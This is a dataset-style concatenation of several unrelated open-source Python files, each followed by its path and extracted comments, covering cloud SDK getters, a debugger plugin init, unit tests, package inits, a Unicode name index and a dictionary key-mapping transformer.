def __init__(__self__, id=None, location=None, name=None, resource=None, tags=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if resource and not isinstance(resource, dict):
raise TypeError("Expected argument 'resource' to be a dict")
pulumi.set(__self__, "resource", resource)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
The unique resource identifier of the ARM resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
The location of the resource group to which the resource belongs.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the ARM resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def resource(self) -> Optional['outputs.SqlStoredProcedureGetPropertiesResponseResource']:
return pulumi.get(self, "resource")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Tags are a list of key-value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters. For example, the default experience for a template type is set with "defaultExperience": "Cassandra". Current "defaultExperience" values also include "Table", "Graph", "DocumentDB", and "MongoDB".
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of Azure resource.
"""
return pulumi.get(self, "type")
class AwaitableGetSqlResourceSqlStoredProcedureResult(GetSqlResourceSqlStoredProcedureResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSqlResourceSqlStoredProcedureResult(
id=self.id,
location=self.location,
name=self.name,
resource=self.resource,
tags=self.tags,
type=self.type)
def get_sql_resource_sql_stored_procedure(account_name: Optional[str] = None,
container_name: Optional[str] = None,
database_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
stored_procedure_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSqlResourceSqlStoredProcedureResult:
"""
An Azure Cosmos DB storedProcedure.
:param str account_name: Cosmos DB database account name.
:param str container_name: Cosmos DB container name.
:param str database_name: Cosmos DB database name.
:param str resource_group_name: The name of the resource group. The name is case insensitive.
:param str stored_procedure_name: Cosmos DB storedProcedure name.
"""
__args__ = dict()
__args__['accountName'] = account_name
__args__['containerName'] = container_name
__args__['databaseName'] = database_name
__args__['resourceGroupName'] = resource_group_name
__args__['storedProcedureName'] = stored_procedure_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:documentdb/v20200401:getSqlResourceSqlStoredProcedure', __args__, opts=opts, typ=GetSqlResourceSqlStoredProcedureResult).value
return AwaitableGetSqlResourceSqlStoredProcedureResult(
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
resource=__ret__.resource,
tags=__ret__.tags,
type=__ret__.type)
| sdk/python/pulumi_azure_native/documentdb/v20200401/get_sql_resource_sql_stored_procedure.py | 5,466 | An Azure Cosmos DB storedProcedure.
An Azure Cosmos DB storedProcedure.
:param str account_name: Cosmos DB database account name.
:param str container_name: Cosmos DB container name.
:param str database_name: Cosmos DB database name.
:param str resource_group_name: The name of the resource group. The name is case insensitive.
:param str stored_procedure_name: Cosmos DB storedProcedure name.
The unique resource identifier of the ARM resource.
The location of the resource group to which the resource belongs.
The name of the ARM resource.
Tags are a list of key-value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters. For example, the default experience for a template type is set with "defaultExperience": "Cassandra". Current "defaultExperience" values also include "Table", "Graph", "DocumentDB", and "MongoDB".
The type of Azure resource.
coding=utf-8 *** WARNING: this file was generated by the Pulumi SDK Generator. *** *** Do not edit by hand unless you're certain you know what you are doing! *** pylint: disable=using-constant-test | 1,269 | en | 0.766132 |
import os
import sys
import time
import _ollyapi
def addscriptpath(script):
"""
Add the path part of the scriptfile to the system path to
allow modules to be loaded from the same place.
Each path is added only once.
"""
pathfound = 0
scriptpath = os.path.dirname(script)
for pathitem in sys.path:
if pathitem == scriptpath:
pathfound = 1
break
if pathfound == 0:
sys.path.append(scriptpath)
def runscript(script):
"""
Run the specified script after adding its directory path to
system path.
This function is used by the low-level plugin code.
"""
addscriptpath(script)
watchdog.reset()
argv = sys.argv
sys.argv = [ script ]
execfile(script, globals())
sys.argv = argv
#-----------------------------------------------------------
# Take over the standard text outputs
#-----------------------------------------------------------
class MyStdOut:
"""
Dummy file-like class that receives stout and stderr
"""
def write(self, text):
# OllyDbg can't handle newlines so strip them out
fixed = text.replace('\n', '')
if fixed != '':
_ollyapi.Addtolist(0, 0, fixed)
def flush(self):
pass
def isatty(self):
return False
# Redirect stderr and stdout to the OllyDbg log window
sys.stdout = sys.stderr = MyStdOut()
# Assign a default sys.argv
sys.argv = [ "" ]
# Have to make sure Python finds our modules
sys.path.append(OLLYPYTHON_PATH)
from ollyapi import *
from ollyutils import *
#-------------------------------------------------------------
# Watchdog to catch runaway scripts after a specified timeout
#
# Usage:
# watchdog.install()
# watchdog.activate(10) # Use 10-second timeout
#
# Note: The watchdog only works for code running inside
# functions, not in global/module namespace.
#-------------------------------------------------------------
class WatchDog():
"""
Python tracer-based watchdog class
"""
def __init__(self, timeout=10):
self.timestamp = 0
self.timeout = timeout
self.installed = False
self.active = False
def install(self):
""" Install the tracer function, required for the watchdog """
if not self.installed:
sys.settrace(self.tracer)
self.installed = True
def activate(self, timeout=None):
""" Activate the watchdog, with optional timeout change """
assert self.installed, "WatchDog must be installed before activating"
if timeout:
self.timeout = timeout
self.reset()
self.active = True
def deactivate(self):
""" Deactivate the watchdog """
self.active = True
def reset(self):
""" Reset the timer, useful for long-running scripts """
self.timestamp = time.clock()
def tracer(self, frame, event, arg):
""" Tracer function that receives the tracing events """
if not self.active:
return None
#if event == 'line':
# if time.clock() - self.timestamp > self.timeout:
# if AskYN(0, "The script has not finished in %d seconds\nWould you like to stop it now?" % self.timeout) == 1:
# raise KeyboardInterrupt
# else:
# self.timestamp = time.clock()
return self.tracer
watchdog = WatchDog(10)
# Load the users personal init file
# Plugin callback handlers
ollypython_shortcuts = []
def add_shortcut_handler(func):
# Need to also make sure the function is the right type
ollypython_shortcuts.append(func)
def remove_shortcut_handler(func):
ollypython_shortcuts.remove(func) | python/init.py | 3,902 | Dummy file-like class that receives stout and stderr
Python tracer-based watchdog class
Activate the watchdog, with optional timeout change
Add the path part of the scriptfile to the system path to
allow modules to be loaded from the same place.
Each path is added only once.
Deactivate the watchdog
Install the tracer function, required for the watchdog
Reset the timer, useful for long-running scripts
Run the specified script after adding its directory path to
system path.
This function is used by the low-level plugin code.
Tracer function that receives the tracing events
----------------------------------------------------------- Take over the standard text outputs----------------------------------------------------------- OllyDbg can't handle newlines so strip them out Redirect stderr and stdout to the OllyDbg log window Assign a default sys.argv Have to make sure Python finds our modules------------------------------------------------------------- Watchdog to catch runaway scripts after a specified timeout Usage: watchdog.install() watchdog.activate(10) Use 10-second timeout Note: The watchdog only works for code running inside functions, not in global/module namespace. -------------------------------------------------------------if event == 'line': if time.clock() - self.timestamp > self.timeout: if AskYN(0, "The script has not finished in %d seconds\nWould you like to stop it now?" % self.timeout) == 1: raise KeyboardInterrupt else: self.timestamp = time.clock() Load the users personal init file Plugin callback handlers Need to also make sure the function is the right type | 1,679 | en | 0.676365 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import *
from builtins import object
READS_LOCATION = 'genestack.location:reads'
READS_LINK = 'genestack.url:reads'
class Key(object):
SPACE = 'space'
FORMAT = 'format'
TYPE = 'type'
class Space(object):
BASESPACE = 'basespace'
COLORSPACE = 'colorspace'
class Format(object):
PHRED33 = 'phred33'
PHRED64 = 'phred64'
FASTA_QUAL = 'fasta-qual'
SRA = 'sra'
SFF = 'sff'
FAST5 = 'fast5'
class Type(object):
SINGLE = 'single'
PAIRED = 'paired'
PAIRED_WITH_UNPAIRED = 'paired-with-unpaired'
def compose_format_map(space, file_format, file_type):
return {Key.SPACE: space,
Key.FORMAT: file_format,
Key.TYPE: file_type}
| genestack_client/unaligned_reads.py | 964 | -*- coding: utf-8 -*- | 21 | en | 0.767281 |
"""The tests for the Script component."""
# pylint: disable=protected-access
import unittest
from unittest.mock import patch, Mock
from homeassistant.components import script
from homeassistant.components.script import DOMAIN
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_NAME, SERVICE_RELOAD, SERVICE_TOGGLE,
SERVICE_TURN_OFF, SERVICE_TURN_ON, EVENT_SCRIPT_STARTED)
from homeassistant.core import Context, callback, split_entity_id
from homeassistant.loader import bind_hass
from homeassistant.setup import setup_component, async_setup_component
from tests.common import get_test_home_assistant
ENTITY_ID = 'script.test'
@bind_hass
def turn_on(hass, entity_id, variables=None, context=None):
"""Turn script on.
This is a legacy helper method. Do not use it for new tests.
"""
_, object_id = split_entity_id(entity_id)
hass.services.call(DOMAIN, object_id, variables, context=context)
@bind_hass
def turn_off(hass, entity_id):
"""Turn script on.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: entity_id})
@bind_hass
def toggle(hass, entity_id):
"""Toggle the script.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: entity_id})
@bind_hass
def reload(hass):
"""Reload script component.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_RELOAD)
class TestScriptComponent(unittest.TestCase):
"""Test the Script component."""
# pylint: disable=invalid-name
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_with_invalid_configs(self):
"""Test setup with invalid configs."""
for value in (
{'test': {}},
{
'test hello world': {
'sequence': [{'event': 'bla'}]
}
},
{
'test': {
'sequence': {
'event': 'test_event',
'service': 'homeassistant.turn_on',
}
}
},
):
assert not setup_component(self.hass, 'script', {
'script': value
}), 'Script loaded with wrong config {}'.format(value)
assert 0 == len(self.hass.states.entity_ids('script'))
def test_turn_on_service(self):
"""Verify that the turn_on service."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
assert setup_component(self.hass, 'script', {
'script': {
'test': {
'sequence': [{
'delay': {
'seconds': 5
}
}, {
'event': event,
}]
}
}
})
turn_on(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
# Calling turn_on a second time should not advance the script
turn_on(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert 0 == len(events)
turn_off(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert not script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
state = self.hass.states.get('group.all_scripts')
assert state is not None
assert state.attributes.get('entity_id') == (ENTITY_ID,)
def test_toggle_service(self):
"""Test the toggling of a service."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
assert setup_component(self.hass, 'script', {
'script': {
'test': {
'sequence': [{
'delay': {
'seconds': 5
}
}, {
'event': event,
}]
}
}
})
toggle(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
toggle(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert not script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
def test_passing_variables(self):
"""Test different ways of passing in variables."""
calls = []
context = Context()
@callback
def record_call(service):
"""Add recorded event to set."""
calls.append(service)
self.hass.services.register('test', 'script', record_call)
assert setup_component(self.hass, 'script', {
'script': {
'test': {
'sequence': {
'service': 'test.script',
'data_template': {
'hello': '{{ greeting }}',
},
},
},
},
})
turn_on(self.hass, ENTITY_ID, {
'greeting': 'world'
}, context=context)
self.hass.block_till_done()
assert len(calls) == 1
assert calls[0].context is context
assert calls[0].data['hello'] == 'world'
self.hass.services.call('script', 'test', {
'greeting': 'universe',
}, context=context)
self.hass.block_till_done()
assert len(calls) == 2
assert calls[1].context is context
assert calls[1].data['hello'] == 'universe'
def test_reload_service(self):
"""Verify that the turn_on service."""
assert setup_component(self.hass, 'script', {
'script': {
'test': {
'sequence': [{
'delay': {
'seconds': 5
}
}]
}
}
})
assert self.hass.states.get(ENTITY_ID) is not None
assert self.hass.services.has_service(script.DOMAIN, 'test')
with patch('homeassistant.config.load_yaml_config_file', return_value={
'script': {
'test2': {
'sequence': [{
'delay': {
'seconds': 5
}
}]
}}}):
with patch('homeassistant.config.find_config_file',
return_value=''):
reload(self.hass)
self.hass.block_till_done()
assert self.hass.states.get(ENTITY_ID) is None
assert not self.hass.services.has_service(script.DOMAIN, 'test')
assert self.hass.states.get("script.test2") is not None
assert self.hass.services.has_service(script.DOMAIN, 'test2')
async def test_shared_context(hass):
"""Test that the shared context is passed down the chain."""
event = 'test_event'
context = Context()
event_mock = Mock()
run_mock = Mock()
hass.bus.async_listen(event, event_mock)
hass.bus.async_listen(EVENT_SCRIPT_STARTED, run_mock)
assert await async_setup_component(hass, 'script', {
'script': {
'test': {
'sequence': [
{'event': event}
]
}
}
})
await hass.services.async_call(DOMAIN, SERVICE_TURN_ON,
{ATTR_ENTITY_ID: ENTITY_ID},
context=context)
await hass.async_block_till_done()
assert event_mock.call_count == 1
assert run_mock.call_count == 1
args, kwargs = run_mock.call_args
assert args[0].context == context
# Ensure event data has all attributes set
assert args[0].data.get(ATTR_NAME) == 'test'
assert args[0].data.get(ATTR_ENTITY_ID) == 'script.test'
# Ensure context carries through the event
args, kwargs = event_mock.call_args
assert args[0].context == context
# Ensure the script state shares the same context
state = hass.states.get('script.test')
assert state is not None
assert state.context == context
| tests/components/test_script.py | 8,952 | Test the Script component.
Add recorded event to set.
Add recorded event to set.
Add recorded event to set.
Reload script component.
This is a legacy helper method. Do not use it for new tests.
Set up things to be run when tests are started.
Stop down everything that was started.
Test different ways of passing in variables.
Verify that the turn_on service.
Test setup with invalid configs.
Test the toggling of a service.
Verify that the turn_on service.
Toggle the script.
This is a legacy helper method. Do not use it for new tests.
Turn script on.
This is a legacy helper method. Do not use it for new tests.
Turn script on.
This is a legacy helper method. Do not use it for new tests.
The tests for the Script component.
pylint: disable=protected-access pylint: disable=invalid-name pylint: disable=invalid-name Calling turn_on a second time should not advance the script Ensure event data has all attributes set Ensure context carries through the event Ensure the script state shares the same context | 1,013 | en | 0.81422 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
# Copyright (C) 2020 Northwestern University.
#
# Flask-Resources is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
from werkzeug.datastructures import MIMEAccept
from werkzeug.http import parse_accept_header
from flask_resources.content_negotiation import ContentNegotiator
# Test content negotiation by Accept header
# NOTE: By scoping down we remove the need to check for HTTP method
def test_choose_provided_and_accepted_mimetype():
# Should choose mimetype that is accepted by client and served by server
server_mimetypes = ["application/json", "application/marcxml+xml"]
client_mimetypes = parse_accept_header(
"text/plain,application/json,*/*", MIMEAccept
)
assert "application/json" == ContentNegotiator.match_by_accept(
server_mimetypes, client_mimetypes
)
client_mimetypes = parse_accept_header(
"text/plain,application/marcxml+xml,*/*", MIMEAccept
)
assert "application/marcxml+xml" == ContentNegotiator.match_by_accept(
server_mimetypes, client_mimetypes
)
def test_favour_specificity_over_quality():
# favour more specific but lower quality mimetype over
# less specific (e.g. wildcard) but higher quality
server_mimetypes = ["application/json", "application/marcxml+xml"]
client_mimetypes = parse_accept_header(
"text/plain, application/json;q=0.5, */*", MIMEAccept
)
assert "application/json" == ContentNegotiator.match_by_accept(
server_mimetypes, client_mimetypes
)
def test_favour_quality_over_same_specificity():
server_mimetypes = ["application/json", "application/marcxml+xml"]
client_mimetypes = parse_accept_header(
"application/json;q=0.5, application/marcxml+xml", MIMEAccept
)
assert "application/marcxml+xml" == ContentNegotiator.match_by_accept(
server_mimetypes, client_mimetypes
)
client_mimetypes = parse_accept_header(
"application/marcxml+xml;q=0.4, application/json;q=0.6", MIMEAccept
)
assert "application/json" == ContentNegotiator.match_by_accept(
server_mimetypes, client_mimetypes
)
def test_choose_default_if_no_match_and_wildcard_accepted():
# choose default if no match and client accepts wildcard
server_mimetypes = ["application/json", "application/marcxml+xml"]
client_mimetypes = parse_accept_header("text/plain,*/*", MIMEAccept)
assert "application/json" == ContentNegotiator.match_by_accept(
server_mimetypes, client_mimetypes, default="application/json"
)
def test_choose_none_if_no_match_and_wildcard_not_accepted():
server_mimetypes = ["application/json", "application/marcxml+xml"]
client_mimetypes = parse_accept_header("text/plain", MIMEAccept)
mime_type = ContentNegotiator.match_by_accept(
server_mimetypes, client_mimetypes, default="application/json"
)
assert mime_type is None
def test_choose_default_if_nothing_accepted():
server_mimetypes = ["application/json", "application/marcxml+xml"]
client_mimetypes = parse_accept_header("", MIMEAccept)
assert "application/json" == ContentNegotiator.match_by_accept(
server_mimetypes, client_mimetypes, default="application/json"
)
# Test content negotiation by URL argument
# NOTE: By scoping down we remove the need to check for HTTP method
def test_choose_query_mimetype():
formats_map = {
"json": "application/json",
"marcxml": "application/marcxml+xml",
}
fmt = "marcxml" # this is the query
assert "application/marcxml+xml" == ContentNegotiator.match_by_format(
formats_map, fmt
)
fmt = "json"
assert "application/json" == ContentNegotiator.match_by_format(formats_map, fmt)
fmt = "foo"
mime_type = ContentNegotiator.match_by_format(formats_map, fmt)
assert mime_type is None
# Test top-level ContentNegotiator.match
def test_favour_query_mimetype_over_header_mimetype():
server_mimetypes = ["application/json", "application/marcxml+xml"]
client_mimetypes = parse_accept_header("application/json", MIMEAccept)
formats_map = {
"json": "application/json",
"marcxml": "application/marcxml+xml",
}
fmt = "marcxml"
assert "application/marcxml+xml" == ContentNegotiator.match(
server_mimetypes, client_mimetypes, formats_map, fmt
)
client_mimetypes = parse_accept_header("application/marcxml+xml", MIMEAccept)
fmt = "json"
assert "application/json" == ContentNegotiator.match(
server_mimetypes, client_mimetypes, formats_map, fmt
)
def test_favour_header_mimetype_if_no_query_mimetype():
server_mimetypes = ["application/json", "application/marcxml+xml"]
client_mimetypes = parse_accept_header("application/json", MIMEAccept)
formats_map = {
"json": "application/json",
"marcxml": "application/marcxml+xml",
}
fmt = None
assert "application/json" == ContentNegotiator.match(
server_mimetypes, client_mimetypes, formats_map, fmt
)
formats_map = {}
fmt = "marcxml"
assert "application/json" == ContentNegotiator.match(
server_mimetypes, client_mimetypes, formats_map, fmt
)
def test_choose_default_if_no_query_and_no_header():
server_mimetypes = ["application/json", "application/marcxml+xml"]
client_mimetypes = parse_accept_header("", MIMEAccept)
formats_map = {
"json": "application/json",
"marcxml": "application/marcxml+xml",
}
fmt = None
assert "application/json" == ContentNegotiator.match(
server_mimetypes, client_mimetypes, formats_map, fmt, default="application/json"
)
| tests/test_content_negotiation.py | 5,795 | -*- coding: utf-8 -*- Copyright (C) 2020 CERN. Copyright (C) 2020 Northwestern University. Flask-Resources is free software; you can redistribute it and/or modify it under the terms of the MIT License; see LICENSE file for more details. Test content negotiation by Accept header NOTE: By scoping down we remove the need to check for HTTP method Should choose mimetype that is accepted by client and served by server favour more specific but lower quality mimetype over less specific (e.g. wildcard) but higher quality choose default if no match and client accepts wildcard Test content negotiation by URL argument NOTE: By scoping down we remove the need to check for HTTP method this is the query Test top-level ContentNegotiator.match | 736 | en | 0.862127 |
# The MIT License (MIT)
#
# Copyright (c) 2015-present, vn-crypto
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from .deribit_gateway import DeribitGateway
import importlib_metadata
__version__ = importlib_metadata.version("vnpy_deribit") | vnpy_deribit/__init__.py | 1,253 | The MIT License (MIT) Copyright (c) 2015-present, vn-crypto Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. | 1,080 | en | 0.858611 |
# Copyright(c) 2016 Nippon Telegraph and Telephone Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pbr import version as pbr_version
MONITORS_VENDOR = "OpenStack Foundation"
MONITORS_PRODUCT = "OpenStack Masakari Monitors"
MONITORS_PACKAGE = None # OS distro package version suffix
loaded = False
version_info = pbr_version.VersionInfo('masakari-monitors')
version_string = version_info.version_string
def _load_config():
# Don't load in global context, since we can't assume
# these modules are accessible when distutils uses
# this module
import configparser
from oslo_config import cfg
from oslo_log import log as logging
global loaded, MONITORS_VENDOR, MONITORS_PRODUCT, MONITORS_PACKAGE
if loaded:
return
loaded = True
cfgfile = cfg.CONF.find_file("release")
if cfgfile is None:
return
try:
cfg = configparser.RawConfigParser()
cfg.read(cfgfile)
if cfg.has_option("Masakarimonitors", "vendor"):
MONITORS_VENDOR = cfg.get("Masakarimonitors", "vendor")
if cfg.has_option("Masakarimonitors", "product"):
MONITORS_PRODUCT = cfg.get("Masakarimonitors", "product")
if cfg.has_option("Masakarimonitors", "package"):
MONITORS_PACKAGE = cfg.get("Masakarimonitors", "package")
except Exception as ex:
LOG = logging.getLogger(__name__)
LOG.error("Failed to load %(cfgfile)s: %(ex)s",
{'cfgfile': cfgfile, 'ex': ex})
def vendor_string():
_load_config()
return MONITORS_VENDOR
def product_string():
_load_config()
return MONITORS_PRODUCT
def package_string():
_load_config()
return MONITORS_PACKAGE
def version_string_with_package():
if package_string() is None:
return version_info.version_string()
else:
return "%s-%s" % (version_info.version_string(), package_string())
| masakarimonitors/version.py | 2,432 | Copyright(c) 2016 Nippon Telegraph and Telephone Corporation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. OS distro package version suffix Don't load in global context, since we can't assume these modules are accessible when distutils uses this module | 728 | en | 0.846302 |
"""sukh_site_v1 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf.urls import url, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('mysite.urls')),
]
| sukh_site_v1/sukh_site_v1/urls.py | 834 | sukh_site_v1 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) | 628 | en | 0.626185 |
"""
``name_index`` builds an inverted index mapping words to sets of Unicode
characters which contain that word in their names. For example::
>>> index = name_index(32, 65)
>>> sorted(index['SIGN'])
['#', '$', '%', '+', '<', '=', '>']
>>> sorted(index['DIGIT'])
['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
>>> index['DIGIT'] & index['EIGHT']
{'8'}
"""
# tag::CHARINDEX[]
import sys
import re
import unicodedata
from typing import Dict, Set, Iterator
RE_WORD = re.compile('\w+')
STOP_CODE = sys.maxunicode + 1
def tokenize(text: str) -> Iterator[str]: # <1>
"""return iterable of uppercased words"""
for match in RE_WORD.finditer(text):
yield match.group().upper()
def name_index(start: int = 32, end: int = STOP_CODE) -> Dict[str, Set[str]]:
index: Dict[str, Set[str]] = {} # <2>
for char in (chr(i) for i in range(start, end)):
if name := unicodedata.name(char, ''): # <3>
for word in tokenize(name):
index.setdefault(word, set()).add(char)
return index
# end::CHARINDEX[]
| 08-def-type-hints/charindex.py | 1,081 | return iterable of uppercased words
``name_index`` builds an inverted index mapping words to sets of Unicode
characters which contain that word in their names. For example::
>>> index = name_index(32, 65)
>>> sorted(index['SIGN'])
['#', '$', '%', '+', '<', '=', '>']
>>> sorted(index['DIGIT'])
['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
>>> index['DIGIT'] & index['EIGHT']
{'8'}
tag::CHARINDEX[] <1> <2> <3> end::CHARINDEX[] | 463 | en | 0.47086 |
from typing import Any, Dict, Mapping, Optional, Set
from pydantic import validator
from transformer.transformers.abstract import ExtraHashableModel, Transformer
from transformer.transformers.flatters import Flatter, FlatterConfig, Unflatter
class ReportMissingData(Exception):
def __init__(self, keys: Set[str]):
self.keys = keys
self.message = f"The keys f{self.keys} are missing in the payload."
class MapKeysConfig(ExtraHashableModel):
"""
This is the configuration for the MapKeys transformer.
In order to call this transformer pass the name "map-keys" and a mapping dict.
"""
mapping: Mapping[str, str]
preserve_unmapped: bool = True
ignore_missing_data: bool = True
level_separator: str = "."
return_plain: bool = False
@validator("mapping")
def backwards_compatibility(cls, mapping: Mapping[str, str]):
return {
key.replace(".$[", "["): value.replace(".$[", "[")
for key, value in mapping.items()
}
class MapKeys(Transformer[MapKeysConfig]):
"""
The MapKeys is a complete dict re-designer.
It lets you rename the keys and also restructure the entire dict. Creating new nested data where there wasn't
and also flattening data that was previously nested is possible, all that preserving the data from the input
dictionary.
"""
def __init__(self, config: MapKeysConfig) -> None:
super().__init__(config)
self.__flatters_config = FlatterConfig(level_separator=config.level_separator)
self.__flatter = Flatter(self.__flatters_config)
self.__unflatter = Unflatter(self.__flatters_config)
def transform(
self, payload: Dict[str, Any], metadata: Optional[Dict[str, Any]] = None
):
"""
The mapping is done in 4 major steps:
1. Flattens the data.
2. Metadata Replacers:
Some key mapping parameters are specified in the metadata. Keys that have placeholders like
${metadata_key} will be substituted by values on the specified metadata key.
3. Map Data.
In this moment the keys of the mapping inside config match the keys of the flat payload. That is, the
payload and self._config.mapping have matching keys. Maybe not all keys in payload are in
self._config.mapping, in which case we choose what to do with those extra keys with the config
self._config.preserve_unmapped. If the opposite happens, the self._config.mapping have keys not present
in the payload, the configuration self._config.ignore_missing_data chooses what should be done.
4. Unflattens the data.
:return: transformed and restructured data.
"""
flat_data = self.__flatter.transform(payload)
translated_dict: Dict = {}
map_keys_set = set(self._config.mapping.keys())
for map_key in map_keys_set.intersection(flat_data.keys()):
map_value = self._config.mapping[map_key]
if metadata is not None:
for meta_key, meta_value in metadata.items():
map_key = map_key.replace("@{" + meta_key + "}", str(meta_value))
map_value = map_value.replace(
"@{" + meta_key + "}", str(meta_value)
)
translated_dict[map_value] = flat_data[map_key]
if not self._config.ignore_missing_data:
missing_keys = map_keys_set - flat_data.keys()
if missing_keys:
raise ReportMissingData(missing_keys)
if self._config.preserve_unmapped:
for unmapped_key in flat_data.keys() - self._config.mapping.keys():
translated_dict[unmapped_key] = flat_data[unmapped_key]
